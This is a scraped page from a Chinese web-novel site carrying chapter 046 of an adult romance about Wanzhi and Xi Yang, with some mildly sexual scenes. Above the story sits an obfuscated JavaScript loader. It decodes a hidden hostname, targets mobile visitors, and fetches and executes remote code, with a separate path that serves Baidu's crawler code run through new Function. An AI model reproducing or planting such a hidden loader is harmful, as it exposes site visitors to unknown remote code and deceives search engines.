98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

046后来(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('046后来

春夏之交的时候,晚栀收到父亲即将去南极考察的消息,隔日动身归期不定,践行的晚餐上第一次见到奚扬那么……恭顺的样子。

不会像在奚荣添面前那样吻上来,把其他人当空气,也不会有不顾场合的亲密动作,顶多会偷偷在桌下牵住她的手,晚栀看着他拿筷子的左手,怪不得有点别扭,原来从头铺垫好了。

虽然还是话少,但他会不时来几句冷幽默,谈及父亲的专业领域问题也头头是道,看样子他私下的功课没白做。

饭后奚扬主动借口取车,留给父女两人谈话私人时间。

如此绅士风范,晚栀看他欠身离开后的背影,幸好只有一天,要不然真受不了。

头上一阵温热,虞父揉了揉她的头发:“笑容变多了。”

“是吗?”伸手抚摸在最后,碰到未收的弧度,她自己也很惊讶。

虽然奚扬表现得留给他们充足的谈话空间,但车子很快就开过来,虞父望着车来的方向:“那孩子也温和很多。”

她就知道忍耐只是一时的,晚栀在心里暗自腹诽。

“上去吧。”虞父跟她挥手作别。

晚栀很惊讶他不让他们送去机,毕竟刚刚提起也没拒绝的,她还没张口问就被父亲堵回去:“我跟同事一起走。”

独自一人上车系好安全带,晚栀坐在副驾驶跟打方向盘的奚扬打招呼:“Hello,gentleman.”

“Good evening,babe.”红灯间隙,他忽然转过头来跟她挑眉,很勾人的那种,看得出来他心情很不错。

忽然想起父亲的最后一句话:“这是能让你们都获得快乐的关系,我没有理由不支持。”

这话已是莫大肯定,其实父亲对她的交友一向不怎么干涉,毕竟她从小到大连贴己好友都不多,更别说什么男朋友了。

只是奚扬是不同的,她知道父亲有很多疑问,但她不提及他就从不过问,也从不给予多余评价,不管是初时的反对还是后来的松动。

回到住处几乎是从车库勾缠到客厅,嘴唇从没离开过,手上的动作也越来越放肆,她没站稳不小心被地毯绊倒,奚扬捞起她一起倒在沙发。

战局一触即发,他堪堪停住,把她的衣服一颗颗扣子扣回去:“你什么时候能好?”那次在车上他没控制力道伤到她了,接下来几天都没碰她。

“好是好了。”身后枕着柔软的沙发抱枕,晚栀在他腿间慢腾腾地磨,短裙低下的双腿长而细,白皙的膝盖安慰着高温到爆炸的某处:“但是我例假来了。”

喉结滚动:“你故意的。”他捉住另一只纤细的脚踝握在掌心,她挣脱起身爬在他身上亲了一下喉结,又在它再次滚动时咬了一口,明显感觉到他呼吸一滞。

知道她的所有不怀好意,但他还是免不了一番沉溺。

黑眸紧盯着她装模作样地叹了口气:“真可惜。”捉住她的手想往下,却被她溜走:“我的论文好像还有点问题。”

“要帮忙吗?”奚扬躺在原处一手遮住脸笑,她还在生气,上次真的惹恼她了,她最讨厌失去掌控的事,但那一天集齐了各种不确定。

回答他的当然是清脆的关门声。

虞晚栀真生起气来不会明确说她动气了,但会无视他的各种请求或者需求,偶尔很乐于在离开前添把火。

书房里原本应该在修论文的人正调颜料,面前没有画纸,只是挤了几管颜料在调色盘调色,奚扬把红糖水端到她面前:“又偷懒。”

太甜又太烫,她没喝几口就放在一边:“你帮我改了?”

“前面改了一点。”他没否认,上次见她电脑没关就顺手随便改了几处。

他早已修满学分,即将提前毕业,奚扬总是不费吹灰之力就走在所有人前面,对此他只是一笑而过:“我没什么娱乐活动。”

从小到大。

她仔细回忆:“Party你也去了。”

奚扬看着她不说话,晚栀正混出一个饱和度刚刚好的黄色,不会过于浓郁又不会太寡淡,像这个时节的太阳,有春末的清新又有初夏的暖度。

许久没听见声音,她抬头见他正坐在画架旁的沙发上,支着下巴不转睛看过来,竟然感觉到恍惚的阳光照拂。

心跳突然漏了一拍,她转移话题:“不去打篮球吗?”

“你来看我打吗?”奚扬邀请过她很多次,但她课业很紧。

身不由己,她耸肩:“你也知道。”

共同完成小组作业的那位日本同学观点模糊,她一开始老是摸不准,后来感觉人家应该是不想担责所以态度保留,所以她肩上的担子更重了。

某天公开课,晚栀坐在后排认真记笔记,感觉身边有人坐下,正准备拿走放在位子上的包,就见到十分钟前刚道别的人就在旁边:“怎么过来了?”

时隔三年多,他们再次坐在校园里同桌上课。

“陪你上课。”衬衫下的骨架匀称,举手投足间从容不迫的姿态显得非常有格调。

奚扬一身黑衬衫加白牛仔,两极的配色像他这个人一样捉摸不定。

启唇正欲再言,视线就被阻隔,所有言语交流都在更直白的唇舌间诉说,肢体默契几乎已成习惯,指尖插入他脑后微短的发梢,长指描摹她侧腰优美的弧度。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间